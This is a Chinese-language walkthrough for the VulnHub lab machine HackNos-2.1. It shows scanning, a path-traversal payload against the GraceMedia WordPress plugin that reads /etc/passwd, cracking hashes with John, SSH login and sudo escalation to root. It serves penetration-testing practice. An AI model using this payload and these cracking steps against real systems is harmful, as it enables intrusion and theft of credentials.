HackNos-2.1
环境搭建
靶机下载:
https://vulnhub.com/entry/hacknos-os-hacknos-21,403/
kaili主机ip:192.168.12.144
靶机ip:192.168.12.164
靶机配置
出现问题:靶机没有ip
1.导入靶机后设置网络模式为NET模式
2.开启靶机,按shift键进入下面的界面
3.按E键进入下面界面
4.找到其中ro,改为
ro--->rw signle init=/bin/bash
5.改完后按ctrl+X,进入shell
6.使用命令
ip -a #查看网卡名,为ens33
vim /etc/netplan/50-cloud-init.yaml
#将网卡名改为上面查看的网卡名
7.重新启动,就可获得ip
一、信息收集
1.主机发现,目标主机ip:192.168.12.164
arp-scan -l
2.扫描目标主机开放的端口,开放22端口,80端口
nmap -sS -sV -A 192.168.12.164
二、漏洞挖掘
1.访问80端口
2.扫描网站目录,发现Wordpress的命名文件
dirb http://192.168.12.164/
3.使用wpscan进行扫描,通过插件查找漏洞
wpscan --url http://192.168.12.164/tsweb/ -e p
# -e 开启枚举模式
# p 枚举所有的插件
三、漏洞利用
1.利用插件进行漏洞搜索,并进行查看
searchsploit gracemedia
cat /usr/share/exploitdb/exploits/php/webapps/46537.txt
2.输入poc,通过文件包含漏洞读取/etc/passwd内容
http://192.168.12.164/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
3.将flag的密码值用 john进行爆破
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
将要破解的密码写入一个文件中
echo "flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/" > demi
开始破解
john --wordlist=/usr/share/wordlists/rockyou.txt demi
查看破解的密码
john --show demi
flag/topsecret
4.利用破解的密码,结合前面信息收集22端口开启,进行登录
ssh flag@192.168.12.164
四、提权
1.查看存在用户
cat /etc/passwd | grep bash
2.查看是否存在备份文件
find / -name backups
3.对其中文件进行查看,再其中发现一个md5-hash文件
cd /var/backups
cat md5-hash
4.再次利用john进行破解
john --wordlist=/usr/share/wordlists/rockyou.txt mim
john --show mim
密码:?:!%hack41
5.猜测密码是用户:rohit,进行用户切换
su rohit
6.发现存在sudo提权
sudo -l
sudo su
7.找到flag文件
cat root.txt